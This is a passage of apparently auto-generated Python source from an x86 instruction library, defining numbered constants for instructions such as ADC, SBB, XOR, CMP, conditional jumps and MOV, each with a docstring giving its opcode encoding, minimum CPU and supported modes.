ADC_RM8_R8: int = 36
"""
``ADC r/m8, r8``
``10 /r``
``8086+``
``16/32/64-bit``
"""
ADC_RM16_R16: int = 37
"""
``ADC r/m16, r16``
``o16 11 /r``
``8086+``
``16/32/64-bit``
"""
ADC_RM32_R32: int = 38
"""
``ADC r/m32, r32``
``o32 11 /r``
``386+``
``16/32/64-bit``
"""
ADC_RM64_R64: int = 39
"""
``ADC r/m64, r64``
``o64 11 /r``
``X64``
``64-bit``
"""
ADC_R8_RM8: int = 40
"""
``ADC r8, r/m8``
``12 /r``
``8086+``
``16/32/64-bit``
"""
ADC_R16_RM16: int = 41
"""
``ADC r16, r/m16``
``o16 13 /r``
``8086+``
``16/32/64-bit``
"""
ADC_R32_RM32: int = 42
"""
``ADC r32, r/m32``
``o32 13 /r``
``386+``
``16/32/64-bit``
"""
ADC_R64_RM64: int = 43
"""
``ADC r64, r/m64``
``o64 13 /r``
``X64``
``64-bit``
"""
ADC_AL_IMM8: int = 44
"""
``ADC AL, imm8``
``14 ib``
``8086+``
``16/32/64-bit``
"""
ADC_AX_IMM16: int = 45
"""
``ADC AX, imm16``
``o16 15 iw``
``8086+``
``16/32/64-bit``
"""
ADC_EAX_IMM32: int = 46
"""
``ADC EAX, imm32``
``o32 15 id``
``386+``
``16/32/64-bit``
"""
ADC_RAX_IMM32: int = 47
"""
``ADC RAX, imm32``
``o64 15 id``
``X64``
``64-bit``
"""
PUSHW_SS: int = 48
"""
``PUSH SS``
``o16 16``
``8086+``
``16/32-bit``
"""
PUSHD_SS: int = 49
"""
``PUSH SS``
``o32 16``
``386+``
``16/32-bit``
"""
POPW_SS: int = 50
"""
``POP SS``
``o16 17``
``8086+``
``16/32-bit``
"""
POPD_SS: int = 51
"""
``POP SS``
``o32 17``
``386+``
``16/32-bit``
"""
SBB_RM8_R8: int = 52
"""
``SBB r/m8, r8``
``18 /r``
``8086+``
``16/32/64-bit``
"""
SBB_RM16_R16: int = 53
"""
``SBB r/m16, r16``
``o16 19 /r``
``8086+``
``16/32/64-bit``
"""
SBB_RM32_R32: int = 54
"""
``SBB r/m32, r32``
``o32 19 /r``
``386+``
``16/32/64-bit``
"""
SBB_RM64_R64: int = 55
"""
``SBB r/m64, r64``
``o64 19 /r``
``X64``
``64-bit``
"""
SBB_R8_RM8: int = 56
"""
``SBB r8, r/m8``
``1A /r``
``8086+``
``16/32/64-bit``
"""
SBB_R16_RM16: int = 57
"""
``SBB r16, r/m16``
``o16 1B /r``
``8086+``
``16/32/64-bit``
"""
SBB_R32_RM32: int = 58
"""
``SBB r32, r/m32``
``o32 1B /r``
``386+``
``16/32/64-bit``
"""
SBB_R64_RM64: int = 59
"""
``SBB r64, r/m64``
``o64 1B /r``
``X64``
``64-bit``
"""
SBB_AL_IMM8: int = 60
"""
``SBB AL, imm8``
``1C ib``
``8086+``
``16/32/64-bit``
"""
SBB_AX_IMM16: int = 61
"""
``SBB AX, imm16``
``o16 1D iw``
``8086+``
``16/32/64-bit``
"""
SBB_EAX_IMM32: int = 62
"""
``SBB EAX, imm32``
``o32 1D id``
``386+``
``16/32/64-bit``
"""
SBB_RAX_IMM32: int = 63
"""
``SBB RAX, imm32``
``o64 1D id``
``X64``
``64-bit``
"""
PUSHW_DS: int = 64
"""
``PUSH DS``
``o16 1E``
``8086+``
``16/32-bit``
"""
PUSHD_DS: int = 65
"""
``PUSH DS``
``o32 1E``
``386+``
``16/32-bit``
"""
POPW_DS: int = 66
"""
``POP DS``
``o16 1F``
``8086+``
``16/32-bit``
"""
POPD_DS: int = 67
"""
``POP DS``
``o32 1F``
``386+``
``16/32-bit``
"""
AND_RM8_R8: int = 68
"""
``AND r/m8, r8``
``20 /r``
``8086+``
``16/32/64-bit``
"""
AND_RM16_R16: int = 69
"""
``AND r/m16, r16``
``o16 21 /r``
``8086+``
``16/32/64-bit``
"""
AND_RM32_R32: int = 70
"""
``AND r/m32, r32``
``o32 21 /r``
``386+``
``16/32/64-bit``
"""
AND_RM64_R64: int = 71
"""
``AND r/m64, r64``
``o64 21 /r``
``X64``
``64-bit``
"""
AND_R8_RM8: int = 72
"""
``AND r8, r/m8``
``22 /r``
``8086+``
``16/32/64-bit``
"""
AND_R16_RM16: int = 73
"""
``AND r16, r/m16``
``o16 23 /r``
``8086+``
``16/32/64-bit``
"""
AND_R32_RM32: int = 74
"""
``AND r32, r/m32``
``o32 23 /r``
``386+``
``16/32/64-bit``
"""
AND_R64_RM64: int = 75
"""
``AND r64, r/m64``
``o64 23 /r``
``X64``
``64-bit``
"""
AND_AL_IMM8: int = 76
"""
``AND AL, imm8``
``24 ib``
``8086+``
``16/32/64-bit``
"""
AND_AX_IMM16: int = 77
"""
``AND AX, imm16``
``o16 25 iw``
``8086+``
``16/32/64-bit``
"""
AND_EAX_IMM32: int = 78
"""
``AND EAX, imm32``
``o32 25 id``
``386+``
``16/32/64-bit``
"""
AND_RAX_IMM32: int = 79
"""
``AND RAX, imm32``
``o64 25 id``
``X64``
``64-bit``
"""
DAA: int = 80
"""
``DAA``
``27``
``8086+``
``16/32-bit``
"""
SUB_RM8_R8: int = 81
"""
``SUB r/m8, r8``
``28 /r``
``8086+``
``16/32/64-bit``
"""
SUB_RM16_R16: int = 82
"""
``SUB r/m16, r16``
``o16 29 /r``
``8086+``
``16/32/64-bit``
"""
SUB_RM32_R32: int = 83
"""
``SUB r/m32, r32``
``o32 29 /r``
``386+``
``16/32/64-bit``
"""
SUB_RM64_R64: int = 84
"""
``SUB r/m64, r64``
``o64 29 /r``
``X64``
``64-bit``
"""
SUB_R8_RM8: int = 85
"""
``SUB r8, r/m8``
``2A /r``
``8086+``
``16/32/64-bit``
"""
SUB_R16_RM16: int = 86
"""
``SUB r16, r/m16``
``o16 2B /r``
``8086+``
``16/32/64-bit``
"""
SUB_R32_RM32: int = 87
"""
``SUB r32, r/m32``
``o32 2B /r``
``386+``
``16/32/64-bit``
"""
SUB_R64_RM64: int = 88
"""
``SUB r64, r/m64``
``o64 2B /r``
``X64``
``64-bit``
"""
SUB_AL_IMM8: int = 89
"""
``SUB AL, imm8``
``2C ib``
``8086+``
``16/32/64-bit``
"""
SUB_AX_IMM16: int = 90
"""
``SUB AX, imm16``
``o16 2D iw``
``8086+``
``16/32/64-bit``
"""
SUB_EAX_IMM32: int = 91
"""
``SUB EAX, imm32``
``o32 2D id``
``386+``
``16/32/64-bit``
"""
SUB_RAX_IMM32: int = 92
"""
``SUB RAX, imm32``
``o64 2D id``
``X64``
``64-bit``
"""
DAS: int = 93
"""
``DAS``
``2F``
``8086+``
``16/32-bit``
"""
XOR_RM8_R8: int = 94
"""
``XOR r/m8, r8``
``30 /r``
``8086+``
``16/32/64-bit``
"""
XOR_RM16_R16: int = 95
"""
``XOR r/m16, r16``
``o16 31 /r``
``8086+``
``16/32/64-bit``
"""
XOR_RM32_R32: int = 96
"""
``XOR r/m32, r32``
``o32 31 /r``
``386+``
``16/32/64-bit``
"""
XOR_RM64_R64: int = 97
"""
``XOR r/m64, r64``
``o64 31 /r``
``X64``
``64-bit``
"""
XOR_R8_RM8: int = 98
"""
``XOR r8, r/m8``
``32 /r``
``8086+``
``16/32/64-bit``
"""
XOR_R16_RM16: int = 99
"""
``XOR r16, r/m16``
``o16 33 /r``
``8086+``
``16/32/64-bit``
"""
XOR_R32_RM32: int = 100
"""
``XOR r32, r/m32``
``o32 33 /r``
``386+``
``16/32/64-bit``
"""
XOR_R64_RM64: int = 101
"""
``XOR r64, r/m64``
``o64 33 /r``
``X64``
``64-bit``
"""
XOR_AL_IMM8: int = 102
"""
``XOR AL, imm8``
``34 ib``
``8086+``
``16/32/64-bit``
"""
XOR_AX_IMM16: int = 103
"""
``XOR AX, imm16``
``o16 35 iw``
``8086+``
``16/32/64-bit``
"""
XOR_EAX_IMM32: int = 104
"""
``XOR EAX, imm32``
``o32 35 id``
``386+``
``16/32/64-bit``
"""
XOR_RAX_IMM32: int = 105
"""
``XOR RAX, imm32``
``o64 35 id``
``X64``
``64-bit``
"""
AAA: int = 106
"""
``AAA``
``37``
``8086+``
``16/32-bit``
"""
CMP_RM8_R8: int = 107
"""
``CMP r/m8, r8``
``38 /r``
``8086+``
``16/32/64-bit``
"""
CMP_RM16_R16: int = 108
"""
``CMP r/m16, r16``
``o16 39 /r``
``8086+``
``16/32/64-bit``
"""
CMP_RM32_R32: int = 109
"""
``CMP r/m32, r32``
``o32 39 /r``
``386+``
``16/32/64-bit``
"""
CMP_RM64_R64: int = 110
"""
``CMP r/m64, r64``
``o64 39 /r``
``X64``
``64-bit``
"""
CMP_R8_RM8: int = 111
"""
``CMP r8, r/m8``
``3A /r``
``8086+``
``16/32/64-bit``
"""
CMP_R16_RM16: int = 112
"""
``CMP r16, r/m16``
``o16 3B /r``
``8086+``
``16/32/64-bit``
"""
CMP_R32_RM32: int = 113
"""
``CMP r32, r/m32``
``o32 3B /r``
``386+``
``16/32/64-bit``
"""
CMP_R64_RM64: int = 114
"""
``CMP r64, r/m64``
``o64 3B /r``
``X64``
``64-bit``
"""
CMP_AL_IMM8: int = 115
"""
``CMP AL, imm8``
``3C ib``
``8086+``
``16/32/64-bit``
"""
CMP_AX_IMM16: int = 116
"""
``CMP AX, imm16``
``o16 3D iw``
``8086+``
``16/32/64-bit``
"""
CMP_EAX_IMM32: int = 117
"""
``CMP EAX, imm32``
``o32 3D id``
``386+``
``16/32/64-bit``
"""
CMP_RAX_IMM32: int = 118
"""
``CMP RAX, imm32``
``o64 3D id``
``X64``
``64-bit``
"""
AAS: int = 119
"""
``AAS``
``3F``
``8086+``
``16/32-bit``
"""
INC_R16: int = 120
"""
``INC r16``
``o16 40+rw``
``8086+``
``16/32-bit``
"""
INC_R32: int = 121
"""
``INC r32``
``o32 40+rd``
``386+``
``16/32-bit``
"""
DEC_R16: int = 122
"""
``DEC r16``
``o16 48+rw``
``8086+``
``16/32-bit``
"""
DEC_R32: int = 123
"""
``DEC r32``
``o32 48+rd``
``386+``
``16/32-bit``
"""
PUSH_R16: int = 124
"""
``PUSH r16``
``o16 50+rw``
``8086+``
``16/32/64-bit``
"""
PUSH_R32: int = 125
"""
``PUSH r32``
``o32 50+rd``
``386+``
``16/32-bit``
"""
PUSH_R64: int = 126
"""
``PUSH r64``
``o64 50+ro``
``X64``
``64-bit``
"""
POP_R16: int = 127
"""
``POP r16``
``o16 58+rw``
``8086+``
``16/32/64-bit``
"""
POP_R32: int = 128
"""
``POP r32``
``o32 58+rd``
``386+``
``16/32-bit``
"""
POP_R64: int = 129
"""
``POP r64``
``o64 58+ro``
``X64``
``64-bit``
"""
PUSHAW: int = 130
"""
``PUSHA``
``o16 60``
``186+``
``16/32-bit``
"""
PUSHAD: int = 131
"""
``PUSHAD``
``o32 60``
``386+``
``16/32-bit``
"""
POPAW: int = 132
"""
``POPA``
``o16 61``
``186+``
``16/32-bit``
"""
POPAD: int = 133
"""
``POPAD``
``o32 61``
``386+``
``16/32-bit``
"""
BOUND_R16_M1616: int = 134
"""
``BOUND r16, m16&16``
``o16 62 /r``
``186+``
``16/32-bit``
"""
BOUND_R32_M3232: int = 135
"""
``BOUND r32, m32&32``
``o32 62 /r``
``386+``
``16/32-bit``
"""
ARPL_RM16_R16: int = 136
"""
``ARPL r/m16, r16``
``o16 63 /r``
``286+``
``16/32-bit``
"""
ARPL_R32M16_R32: int = 137
"""
``ARPL r32/m16, r32``
``o32 63 /r``
``386+``
``16/32-bit``
"""
MOVSXD_R16_RM16: int = 138
"""
``MOVSXD r16, r/m16``
``o16 63 /r``
``X64``
``64-bit``
"""
MOVSXD_R32_RM32: int = 139
"""
``MOVSXD r32, r/m32``
``o32 63 /r``
``X64``
``64-bit``
"""
MOVSXD_R64_RM32: int = 140
"""
``MOVSXD r64, r/m32``
``o64 63 /r``
``X64``
``64-bit``
"""
PUSH_IMM16: int = 141
"""
``PUSH imm16``
``o16 68 iw``
``186+``
``16/32/64-bit``
"""
PUSHD_IMM32: int = 142
"""
``PUSH imm32``
``o32 68 id``
``386+``
``16/32-bit``
"""
PUSHQ_IMM32: int = 143
"""
``PUSH imm32``
``o64 68 id``
``X64``
``64-bit``
"""
IMUL_R16_RM16_IMM16: int = 144
"""
``IMUL r16, r/m16, imm16``
``o16 69 /r iw``
``186+``
``16/32/64-bit``
"""
IMUL_R32_RM32_IMM32: int = 145
"""
``IMUL r32, r/m32, imm32``
``o32 69 /r id``
``386+``
``16/32/64-bit``
"""
IMUL_R64_RM64_IMM32: int = 146
"""
``IMUL r64, r/m64, imm32``
``o64 69 /r id``
``X64``
``64-bit``
"""
PUSHW_IMM8: int = 147
"""
``PUSH imm8``
``o16 6A ib``
``186+``
``16/32/64-bit``
"""
PUSHD_IMM8: int = 148
"""
``PUSH imm8``
``o32 6A ib``
``386+``
``16/32-bit``
"""
PUSHQ_IMM8: int = 149
"""
``PUSH imm8``
``o64 6A ib``
``X64``
``64-bit``
"""
IMUL_R16_RM16_IMM8: int = 150
"""
``IMUL r16, r/m16, imm8``
``o16 6B /r ib``
``186+``
``16/32/64-bit``
"""
IMUL_R32_RM32_IMM8: int = 151
"""
``IMUL r32, r/m32, imm8``
``o32 6B /r ib``
``386+``
``16/32/64-bit``
"""
IMUL_R64_RM64_IMM8: int = 152
"""
``IMUL r64, r/m64, imm8``
``o64 6B /r ib``
``X64``
``64-bit``
"""
INSB_M8_DX: int = 153
"""
``INSB``
``6C``
``186+``
``16/32/64-bit``
"""
INSW_M16_DX: int = 154
"""
``INSW``
``o16 6D``
``186+``
``16/32/64-bit``
"""
INSD_M32_DX: int = 155
"""
``INSD``
``o32 6D``
``386+``
``16/32/64-bit``
"""
OUTSB_DX_M8: int = 156
"""
``OUTSB``
``6E``
``186+``
``16/32/64-bit``
"""
OUTSW_DX_M16: int = 157
"""
``OUTSW``
``o16 6F``
``186+``
``16/32/64-bit``
"""
OUTSD_DX_M32: int = 158
"""
``OUTSD``
``o32 6F``
``386+``
``16/32/64-bit``
"""
JO_REL8_16: int = 159
"""
``JO rel8``
``o16 70 cb``
``8086+``
``16/32/64-bit``
"""
JO_REL8_32: int = 160
"""
``JO rel8``
``o32 70 cb``
``386+``
``16/32-bit``
"""
JO_REL8_64: int = 161
"""
``JO rel8``
``o64 70 cb``
``X64``
``64-bit``
"""
JNO_REL8_16: int = 162
"""
``JNO rel8``
``o16 71 cb``
``8086+``
``16/32/64-bit``
"""
JNO_REL8_32: int = 163
"""
``JNO rel8``
``o32 71 cb``
``386+``
``16/32-bit``
"""
JNO_REL8_64: int = 164
"""
``JNO rel8``
``o64 71 cb``
``X64``
``64-bit``
"""
JB_REL8_16: int = 165
"""
``JB rel8``
``o16 72 cb``
``8086+``
``16/32/64-bit``
"""
JB_REL8_32: int = 166
"""
``JB rel8``
``o32 72 cb``
``386+``
``16/32-bit``
"""
JB_REL8_64: int = 167
"""
``JB rel8``
``o64 72 cb``
``X64``
``64-bit``
"""
JAE_REL8_16: int = 168
"""
``JAE rel8``
``o16 73 cb``
``8086+``
``16/32/64-bit``
"""
JAE_REL8_32: int = 169
"""
``JAE rel8``
``o32 73 cb``
``386+``
``16/32-bit``
"""
JAE_REL8_64: int = 170
"""
``JAE rel8``
``o64 73 cb``
``X64``
``64-bit``
"""
JE_REL8_16: int = 171
"""
``JE rel8``
``o16 74 cb``
``8086+``
``16/32/64-bit``
"""
JE_REL8_32: int = 172
"""
``JE rel8``
``o32 74 cb``
``386+``
``16/32-bit``
"""
JE_REL8_64: int = 173
"""
``JE rel8``
``o64 74 cb``
``X64``
``64-bit``
"""
JNE_REL8_16: int = 174
"""
``JNE rel8``
``o16 75 cb``
``8086+``
``16/32/64-bit``
"""
JNE_REL8_32: int = 175
"""
``JNE rel8``
``o32 75 cb``
``386+``
``16/32-bit``
"""
JNE_REL8_64: int = 176
"""
``JNE rel8``
``o64 75 cb``
``X64``
``64-bit``
"""
JBE_REL8_16: int = 177
"""
``JBE rel8``
``o16 76 cb``
``8086+``
``16/32/64-bit``
"""
JBE_REL8_32: int = 178
"""
``JBE rel8``
``o32 76 cb``
``386+``
``16/32-bit``
"""
JBE_REL8_64: int = 179
"""
``JBE rel8``
``o64 76 cb``
``X64``
``64-bit``
"""
JA_REL8_16: int = 180
"""
``JA rel8``
``o16 77 cb``
``8086+``
``16/32/64-bit``
"""
JA_REL8_32: int = 181
"""
``JA rel8``
``o32 77 cb``
``386+``
``16/32-bit``
"""
JA_REL8_64: int = 182
"""
``JA rel8``
``o64 77 cb``
``X64``
``64-bit``
"""
JS_REL8_16: int = 183
"""
``JS rel8``
``o16 78 cb``
``8086+``
``16/32/64-bit``
"""
JS_REL8_32: int = 184
"""
``JS rel8``
``o32 78 cb``
``386+``
``16/32-bit``
"""
JS_REL8_64: int = 185
"""
``JS rel8``
``o64 78 cb``
``X64``
``64-bit``
"""
JNS_REL8_16: int = 186
"""
``JNS rel8``
``o16 79 cb``
``8086+``
``16/32/64-bit``
"""
JNS_REL8_32: int = 187
"""
``JNS rel8``
``o32 79 cb``
``386+``
``16/32-bit``
"""
JNS_REL8_64: int = 188
"""
``JNS rel8``
``o64 79 cb``
``X64``
``64-bit``
"""
JP_REL8_16: int = 189
"""
``JP rel8``
``o16 7A cb``
``8086+``
``16/32/64-bit``
"""
JP_REL8_32: int = 190
"""
``JP rel8``
``o32 7A cb``
``386+``
``16/32-bit``
"""
JP_REL8_64: int = 191
"""
``JP rel8``
``o64 7A cb``
``X64``
``64-bit``
"""
JNP_REL8_16: int = 192
"""
``JNP rel8``
``o16 7B cb``
``8086+``
``16/32/64-bit``
"""
JNP_REL8_32: int = 193
"""
``JNP rel8``
``o32 7B cb``
``386+``
``16/32-bit``
"""
JNP_REL8_64: int = 194
"""
``JNP rel8``
``o64 7B cb``
``X64``
``64-bit``
"""
JL_REL8_16: int = 195
"""
``JL rel8``
``o16 7C cb``
``8086+``
``16/32/64-bit``
"""
JL_REL8_32: int = 196
"""
``JL rel8``
``o32 7C cb``
``386+``
``16/32-bit``
"""
JL_REL8_64: int = 197
"""
``JL rel8``
``o64 7C cb``
``X64``
``64-bit``
"""
JGE_REL8_16: int = 198
"""
``JGE rel8``
``o16 7D cb``
``8086+``
``16/32/64-bit``
"""
JGE_REL8_32: int = 199
"""
``JGE rel8``
``o32 7D cb``
``386+``
``16/32-bit``
"""
JGE_REL8_64: int = 200
"""
``JGE rel8``
``o64 7D cb``
``X64``
``64-bit``
"""
JLE_REL8_16: int = 201
"""
``JLE rel8``
``o16 7E cb``
``8086+``
``16/32/64-bit``
"""
JLE_REL8_32: int = 202
"""
``JLE rel8``
``o32 7E cb``
``386+``
``16/32-bit``
"""
JLE_REL8_64: int = 203
"""
``JLE rel8``
``o64 7E cb``
``X64``
``64-bit``
"""
JG_REL8_16: int = 204
"""
``JG rel8``
``o16 7F cb``
``8086+``
``16/32/64-bit``
"""
JG_REL8_32: int = 205
"""
``JG rel8``
``o32 7F cb``
``386+``
``16/32-bit``
"""
JG_REL8_64: int = 206
"""
``JG rel8``
``o64 7F cb``
``X64``
``64-bit``
"""
ADD_RM8_IMM8: int = 207
"""
``ADD r/m8, imm8``
``80 /0 ib``
``8086+``
``16/32/64-bit``
"""
OR_RM8_IMM8: int = 208
"""
``OR r/m8, imm8``
``80 /1 ib``
``8086+``
``16/32/64-bit``
"""
ADC_RM8_IMM8: int = 209
"""
``ADC r/m8, imm8``
``80 /2 ib``
``8086+``
``16/32/64-bit``
"""
SBB_RM8_IMM8: int = 210
"""
``SBB r/m8, imm8``
``80 /3 ib``
``8086+``
``16/32/64-bit``
"""
AND_RM8_IMM8: int = 211
"""
``AND r/m8, imm8``
``80 /4 ib``
``8086+``
``16/32/64-bit``
"""
SUB_RM8_IMM8: int = 212
"""
``SUB r/m8, imm8``
``80 /5 ib``
``8086+``
``16/32/64-bit``
"""
XOR_RM8_IMM8: int = 213
"""
``XOR r/m8, imm8``
``80 /6 ib``
``8086+``
``16/32/64-bit``
"""
CMP_RM8_IMM8: int = 214
"""
``CMP r/m8, imm8``
``80 /7 ib``
``8086+``
``16/32/64-bit``
"""
ADD_RM16_IMM16: int = 215
"""
``ADD r/m16, imm16``
``o16 81 /0 iw``
``8086+``
``16/32/64-bit``
"""
ADD_RM32_IMM32: int = 216
"""
``ADD r/m32, imm32``
``o32 81 /0 id``
``386+``
``16/32/64-bit``
"""
ADD_RM64_IMM32: int = 217
"""
``ADD r/m64, imm32``
``o64 81 /0 id``
``X64``
``64-bit``
"""
OR_RM16_IMM16: int = 218
"""
``OR r/m16, imm16``
``o16 81 /1 iw``
``8086+``
``16/32/64-bit``
"""
OR_RM32_IMM32: int = 219
"""
``OR r/m32, imm32``
``o32 81 /1 id``
``386+``
``16/32/64-bit``
"""
OR_RM64_IMM32: int = 220
"""
``OR r/m64, imm32``
``o64 81 /1 id``
``X64``
``64-bit``
"""
ADC_RM16_IMM16: int = 221
"""
``ADC r/m16, imm16``
``o16 81 /2 iw``
``8086+``
``16/32/64-bit``
"""
ADC_RM32_IMM32: int = 222
"""
``ADC r/m32, imm32``
``o32 81 /2 id``
``386+``
``16/32/64-bit``
"""
ADC_RM64_IMM32: int = 223
"""
``ADC r/m64, imm32``
``o64 81 /2 id``
``X64``
``64-bit``
"""
SBB_RM16_IMM16: int = 224
"""
``SBB r/m16, imm16``
``o16 81 /3 iw``
``8086+``
``16/32/64-bit``
"""
SBB_RM32_IMM32: int = 225
"""
``SBB r/m32, imm32``
``o32 81 /3 id``
``386+``
``16/32/64-bit``
"""
SBB_RM64_IMM32: int = 226
"""
``SBB r/m64, imm32``
``o64 81 /3 id``
``X64``
``64-bit``
"""
AND_RM16_IMM16: int = 227
"""
``AND r/m16, imm16``
``o16 81 /4 iw``
``8086+``
``16/32/64-bit``
"""
AND_RM32_IMM32: int = 228
"""
``AND r/m32, imm32``
``o32 81 /4 id``
``386+``
``16/32/64-bit``
"""
AND_RM64_IMM32: int = 229
"""
``AND r/m64, imm32``
``o64 81 /4 id``
``X64``
``64-bit``
"""
SUB_RM16_IMM16: int = 230
"""
``SUB r/m16, imm16``
``o16 81 /5 iw``
``8086+``
``16/32/64-bit``
"""
SUB_RM32_IMM32: int = 231
"""
``SUB r/m32, imm32``
``o32 81 /5 id``
``386+``
``16/32/64-bit``
"""
SUB_RM64_IMM32: int = 232
"""
``SUB r/m64, imm32``
``o64 81 /5 id``
``X64``
``64-bit``
"""
XOR_RM16_IMM16: int = 233
"""
``XOR r/m16, imm16``
``o16 81 /6 iw``
``8086+``
``16/32/64-bit``
"""
XOR_RM32_IMM32: int = 234
"""
``XOR r/m32, imm32``
``o32 81 /6 id``
``386+``
``16/32/64-bit``
"""
XOR_RM64_IMM32: int = 235
"""
``XOR r/m64, imm32``
``o64 81 /6 id``
``X64``
``64-bit``
"""
CMP_RM16_IMM16: int = 236
"""
``CMP r/m16, imm16``
``o16 81 /7 iw``
``8086+``
``16/32/64-bit``
"""
CMP_RM32_IMM32: int = 237
"""
``CMP r/m32, imm32``
``o32 81 /7 id``
``386+``
``16/32/64-bit``
"""
CMP_RM64_IMM32: int = 238
"""
``CMP r/m64, imm32``
``o64 81 /7 id``
``X64``
``64-bit``
"""
ADD_RM8_IMM8_82: int = 239
"""
``ADD r/m8, imm8``
``82 /0 ib``
``8086+``
``16/32-bit``
"""
OR_RM8_IMM8_82: int = 240
"""
``OR r/m8, imm8``
``82 /1 ib``
``8086+``
``16/32-bit``
"""
ADC_RM8_IMM8_82: int = 241
"""
``ADC r/m8, imm8``
``82 /2 ib``
``8086+``
``16/32-bit``
"""
SBB_RM8_IMM8_82: int = 242
"""
``SBB r/m8, imm8``
``82 /3 ib``
``8086+``
``16/32-bit``
"""
AND_RM8_IMM8_82: int = 243
"""
``AND r/m8, imm8``
``82 /4 ib``
``8086+``
``16/32-bit``
"""
SUB_RM8_IMM8_82: int = 244
"""
``SUB r/m8, imm8``
``82 /5 ib``
``8086+``
``16/32-bit``
"""
XOR_RM8_IMM8_82: int = 245
"""
``XOR r/m8, imm8``
``82 /6 ib``
``8086+``
``16/32-bit``
"""
CMP_RM8_IMM8_82: int = 246
"""
``CMP r/m8, imm8``
``82 /7 ib``
``8086+``
``16/32-bit``
"""
ADD_RM16_IMM8: int = 247
"""
``ADD r/m16, imm8``
``o16 83 /0 ib``
``8086+``
``16/32/64-bit``
"""
ADD_RM32_IMM8: int = 248
"""
``ADD r/m32, imm8``
``o32 83 /0 ib``
``386+``
``16/32/64-bit``
"""
ADD_RM64_IMM8: int = 249
"""
``ADD r/m64, imm8``
``o64 83 /0 ib``
``X64``
``64-bit``
"""
OR_RM16_IMM8: int = 250
"""
``OR r/m16, imm8``
``o16 83 /1 ib``
``8086+``
``16/32/64-bit``
"""
OR_RM32_IMM8: int = 251
"""
``OR r/m32, imm8``
``o32 83 /1 ib``
``386+``
``16/32/64-bit``
"""
OR_RM64_IMM8: int = 252
"""
``OR r/m64, imm8``
``o64 83 /1 ib``
``X64``
``64-bit``
"""
ADC_RM16_IMM8: int = 253
"""
``ADC r/m16, imm8``
``o16 83 /2 ib``
``8086+``
``16/32/64-bit``
"""
ADC_RM32_IMM8: int = 254
"""
``ADC r/m32, imm8``
``o32 83 /2 ib``
``386+``
``16/32/64-bit``
"""
ADC_RM64_IMM8: int = 255
"""
``ADC r/m64, imm8``
``o64 83 /2 ib``
``X64``
``64-bit``
"""
SBB_RM16_IMM8: int = 256
"""
``SBB r/m16, imm8``
``o16 83 /3 ib``
``8086+``
``16/32/64-bit``
"""
SBB_RM32_IMM8: int = 257
"""
``SBB r/m32, imm8``
``o32 83 /3 ib``
``386+``
``16/32/64-bit``
"""
SBB_RM64_IMM8: int = 258
"""
``SBB r/m64, imm8``
``o64 83 /3 ib``
``X64``
``64-bit``
"""
AND_RM16_IMM8: int = 259
"""
``AND r/m16, imm8``
``o16 83 /4 ib``
``8086+``
``16/32/64-bit``
"""
AND_RM32_IMM8: int = 260
"""
``AND r/m32, imm8``
``o32 83 /4 ib``
``386+``
``16/32/64-bit``
"""
AND_RM64_IMM8: int = 261
"""
``AND r/m64, imm8``
``o64 83 /4 ib``
``X64``
``64-bit``
"""
SUB_RM16_IMM8: int = 262
"""
``SUB r/m16, imm8``
``o16 83 /5 ib``
``8086+``
``16/32/64-bit``
"""
SUB_RM32_IMM8: int = 263
"""
``SUB r/m32, imm8``
``o32 83 /5 ib``
``386+``
``16/32/64-bit``
"""
SUB_RM64_IMM8: int = 264
"""
``SUB r/m64, imm8``
``o64 83 /5 ib``
``X64``
``64-bit``
"""
XOR_RM16_IMM8: int = 265
"""
``XOR r/m16, imm8``
``o16 83 /6 ib``
``8086+``
``16/32/64-bit``
"""
XOR_RM32_IMM8: int = 266
"""
``XOR r/m32, imm8``
``o32 83 /6 ib``
``386+``
``16/32/64-bit``
"""
XOR_RM64_IMM8: int = 267
"""
``XOR r/m64, imm8``
``o64 83 /6 ib``
``X64``
``64-bit``
"""
CMP_RM16_IMM8: int = 268
"""
``CMP r/m16, imm8``
``o16 83 /7 ib``
``8086+``
``16/32/64-bit``
"""
CMP_RM32_IMM8: int = 269
"""
``CMP r/m32, imm8``
``o32 83 /7 ib``
``386+``
``16/32/64-bit``
"""
CMP_RM64_IMM8: int = 270
"""
``CMP r/m64, imm8``
``o64 83 /7 ib``
``X64``
``64-bit``
"""
TEST_RM8_R8: int = 271
"""
``TEST r/m8, r8``
``84 /r``
``8086+``
``16/32/64-bit``
"""
TEST_RM16_R16: int = 272
"""
``TEST r/m16, r16``
``o16 85 /r``
``8086+``
``16/32/64-bit``
"""
TEST_RM32_R32: int = 273
"""
``TEST r/m32, r32``
``o32 85 /r``
``386+``
``16/32/64-bit``
"""
TEST_RM64_R64: int = 274
"""
``TEST r/m64, r64``
``o64 85 /r``
``X64``
``64-bit``
"""
XCHG_RM8_R8: int = 275
"""
``XCHG r/m8, r8``
``86 /r``
``8086+``
``16/32/64-bit``
"""
XCHG_RM16_R16: int = 276
"""
``XCHG r/m16, r16``
``o16 87 /r``
``8086+``
``16/32/64-bit``
"""
XCHG_RM32_R32: int = 277
"""
``XCHG r/m32, r32``
``o32 87 /r``
``386+``
``16/32/64-bit``
"""
XCHG_RM64_R64: int = 278
"""
``XCHG r/m64, r64``
``o64 87 /r``
``X64``
``64-bit``
"""
MOV_RM8_R8: int = 279
"""
``MOV r/m8, r8``
``88 /r``
``8086+``
``16/32/64-bit``
"""
MOV_RM16_R16: int = 280
"""
``MOV r/m16, r16``
``o16 89 /r``
``8086+``
``16/32/64-bit``
"""
MOV_RM32_R32: int = 281
"""
``MOV r/m32, r32``
``o32 89 /r``
``386+``
``16/32/64-bit``
"""
MOV_RM64_R64: int = 282
"""
``MOV r/m64, r64``
``o64 89 /r``
``X64``
``64-bit``
"""
MOV_R8_RM8: int = 283
"""
``MOV r8, r/m8``
``8A /r``
``8086+``
``16/32/64-bit``
"""
MOV_R16_RM16: int = 284
"""
``MOV r16, r/m16``
``o16 8B /r``
``8086+``
``16/32/64-bit``
"""
MOV_R32_RM32: int = 285
"""
``MOV r32, r/m32``
``o32 8B /r``
``386+``
``16/32/64-bit``
"""
MOV_R64_RM64: int = 286
"""
``MOV r64, r/m64``
``o64 8B /r``
``X64``
``64-bit``
"""
MOV_RM16_SREG: int = 287
"""
``MOV r/m16, Sreg``
``o16 8C /r``
``8086+``
``16/32/64-bit``
"""
MOV_R32M16_SREG: int = 288
"""
``MOV r32/m16, Sreg``
``o32 8C /r``
``386+``
``16/32/64-bit``
"""
MOV_R64M16_SREG: int = 289
"""
``MOV r64/m16, Sreg``
``o64 8C /r``
``X64``
``64-bit``
"""
LEA_R16_M: int = 290
"""
``LEA r16, m``
``o16 8D /r``
``8086+``
``16/32/64-bit``
"""
LEA_R32_M: int = 291
"""
